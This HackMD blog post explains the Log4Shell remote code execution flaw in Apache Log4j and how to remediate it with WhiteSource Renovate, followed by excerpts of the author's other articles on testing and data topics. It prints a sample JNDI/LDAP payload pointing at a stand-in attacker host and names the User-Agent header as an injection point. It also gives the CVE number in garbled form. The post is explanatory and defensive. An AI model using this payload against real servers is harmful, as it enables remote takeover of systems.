Try   HackMD

Tackling the New Apache Log4j Vulnerability

Photo by Arget on Unsplash

In this article, I will talk about the recently popular security vulnerability Log4j RCE (CVE-202144228) and how you can protect yourself using WhiteSource Renovate.

To understand Log4j RCE, we first need to briefly understand what the Apache Log4j library is. So, let's get started.

What Is Apache Log4j?

Apache Log4j is a Java-based logging framework that provides logging of errors while hunting bugs in the development process of any software.

Log4j is one of the preferred logging services for Java because it is both popular and easy to use. So, many of the big companies, such as Apple, Steam, Tesla, and Minecraft, use this product.

What Is Log4Shell?

Source

First, let's back up a little bit. The main reason why the Log4j framework has been so popular lately is that on December 9, 2021, a remote code execution vulnerability was found in the Log4j framework and named "Log4Shell" by the Alibaba Cloud security team.

Log4Shell basically allows attackers to execute code on the target vulnerable server remotely. This could potentially be called a takeover of the entire system.

Now, many big companies using this product are vulnerable to this exploitation. The vulnerability was detected in Apple, Steam, and Minecraft, and it attracted a lot of attention.

If we try to understand the vulnerability technically, CVE-202144228 is summarized by the National Vulnerability Database (NVD) as follows.

"Apache Log4j2 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints."

If a hacker controls the log messages or log message parameters, they can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior was disabled by default, and from version 2.16.0, this function was completely removed.

What makes CVE-202144228 particularly dangerous (10.0 Critical) is how easy it is to exploit. An attacker only needs to send a string to an endpoint with the vulnerable version of log4j.

CVE-202144228: Log4Shell Analysis

Let's take a look at the payload the attacker will use to understand the exploitation phase more easily.

A simple Log4Shell payload pattern looks like this: ${jndi:ldap://attacker.com/a

In addition, payload models can be diversified to bypass WAFs or firewalls. If you want to review more payloads, you can look at some GitHub repositories.

As can be seen in the above image, the payload basically consists of three units:

I) Java Naming and Directory Interface (JNDI): It is an API (application programming interface) service that enables Java applications to find data and resources and communicate with services such as LDAP. The JNDI service also has another service known as SPI (service provider interface), which allows it to create and use various directory services.

II) Lightweight Directory Access Protocol (LDAP): It is a type of communication protocol used to query any application running on TCP/IP and access directory information services. Java-based applications can use JNDI+LDAP services together to query and access data. So, LDAP can be preferred for information access from any server running on the remote machine.

III) Any server controlled by the attacker: A server created by the attacker to use when communicating with the vulnerable server. (In some test scenarios, DNS logging services can be used to determine whether the target server is vulnerable.)

Example vulnerable code by Lunasec

After this stage, all the attacker will do is paste the malicious payload code to any input point to be logged and try to communicate with the server.

There may be too many vulnerable entry points. One of them is User-Agent, which is one of the HTTP protocols. User-Agent is another way attackers often find success as User-Agent is the HTTP header where all contact information between the end user and web application is shared. This header contains user-specific details such as the user's operating system, browser application, and the versions.

Tackling Log4Shell Using WhiteSource Renovate

WhiteSource Renovate is a free developer tool developed by WhiteSource. This tool was created to fix out-of-date dependencies in software projects.

As every developer knows, a software project starts with all its dependencies being up to date, but loses this feature over time. Renovate can detect outdated dependencies in projects while also checking for the availability of new versions. In addition, it can create commits and merge/pull requests to show release notes.

You can implant the application in your GitHub repository via the GitHub App or access the installation details as open source.

If you have a GitHub repository, you can easily implant the application into your repository.

Now that I have given you a basic explanation of the WhiteSource Renovate tool, I can explain how you can protect yourself from the Log4Shell vulnerability by using this tool.

Having implemented the Renovate tool in our GitHub repository, let's examine the GitHub repository for Log4Shell. This repository contains hundreds of files preset by WhiteSource to be fixed to non-Log4Shell versions.

To use this preset, add it to your Renovate. Your Renovate.json config file will look like this:

For more details, you can check their Git repo for Log4j remediations as well.

Conclusion

I hope this article about the Log4Shell vulnerability and some of the precautions that can be taken was helpful. That's all for now.

Thanks for reading! Join me later for another write up!

Last changed by 
Sam Frankson
0
229

Read more

How to Ensure Runtime Protection for Application Security

Software applications are at the core of the whole digital world. Hence, application security plays an essential part in the software development process, as hackers always come up with new and different ways of getting access to the system, therefore, application security is always the highest priority in most organizations. Application security is the process of using best practices and techniques to secure the software and hardware of the computer systems from any outside malicious attacks. In simple terms application security can be described as using different security measures at the application level for preventing unauthorized access and the leak of valuable information or data from the software application. Even after employing various security techniques some of the vulnerabilities go unnoticed during the quality assurance phase and they end up in production, which hackers can use to their advantage to get unauthorized access into the system and cause a security breach. Once a vulnerability or bug goes into production, even the network defenders find it difficult to defend the applications from various attacks. This can be protected by ensuring that the applications themselves identify the attacks and protect themselves in real-time. Such protection can be ensured using runtime protection. So, this article explains what is runtime protection and how it can be used to secure the application in production. Runtime Protection The application layer of any software application is the most attacked layer and is considered to be the difficult layer to defend in the entire software stack, hence it requires various appsec testing tools to ensure that the application runs securely while it is deployed to production. These tools are mainly divided into two main categories of security scanning and runtime protection tools. Security scanning tools are used when the applications are in the development stage to detect and remediate the security vulnerabilities and risks while runtime protection tools are used while the application is in production and it works as an extra layer of security to the application.

Oct 31, 2022
Best Practices for Data Ingestion

Many of the enterprise's mission-critical engines, including business intelligence, predictive analytics, data science, and machine learning, are powered by data. Like any fuel, data must be plentiful, accessible, and clean in order to be completely useful. The stages of extract (taking the data from its current place), transform (cleaning and normalizing the data), and load are typically included in the data ingestion process, which prepares data for analysis (placing the data in a database where it can be analyzed). Extract and load are normally simple for businesses, but transform is often a challenge. As a result, if no data has been ingested for processing, an analytical engine may lie idle. What is Data Ingestion? Data ingestion is described as the procedure of gathering data from several sources and sending it to a destination where it may be deposited and examined. The destination can generally be a database, data warehouse, document storage system, or data mart. However, there are a variety of sources available, including spreadsheets, web data extractions (also known as web scrapings), internal programmes, and SaaS data. Source Business data is frequently stored in several sources and formats. For instance, Salesforce.com keeps sales data whereas relational DBMSs store product information. Since this data comes from many sources, it needs to be cleaned and transformed into a format that can be easily examined for decision-making using a simple data intake tool. If this is not done, you'll be stuck with pieces that can't be stitched together.

Oct 17, 2022
What is Load Testing and Why Should You Implement It

Photo by Sigmund on Unsplash As a software development project nears completion, it has almost definitely been subjected to a number of tests, particularly in extreme testing environments where testing and development occur concurrently. There's only one way to tell if your software can withstand the pressures that your end customers will soon put on it: load testing. What is Load Testing? Load testing is one of the several methods of performance testing. Load testing is used to verify a system's performance under real-world settings. Load testing is a software testing procedure that assesses the performance of a software application under a certain expected load. JMeter Load Testing is a testing technique that uses Apache JMeter, a Java-based open source desktop software. It determines if the web application under test can handle high demand. It also helps in examining the entire server under high demand. Load testing is used to improve performance and verify the stability and seamless operation of software applications prior to deployment. How it Works

Aug 12, 2022
Conducting Parallel Testing in Regression

Photo by David Travis on Unsplash Today, there are many types of testing methods in the software development lifecycle, each having advantages and disadvantages in terms of efficiency, time-saving, cost, reliability, usability and so on. In general, we can categorize software testing methods under four main headings: functional testing, non-functional testing, manual testing and automated testing. In this article, we will focus on what automated testing is, why it is useful, main techniques in automated testing like regression testing, and some popular tools for automated testing. What Is Automated Testing? In general terms, automated testing is testing software or programs utilizing some automation tools for many edge cases instead of a human-driven manual process of monitoring and validating a product. In the market, there are some popular tools that offer a wide range of services for automation testing like Selenium, WebDriver, Appium, and Cucumber. Source

Mar 22, 2022
Read more from Sam Frankson
Published on HackMD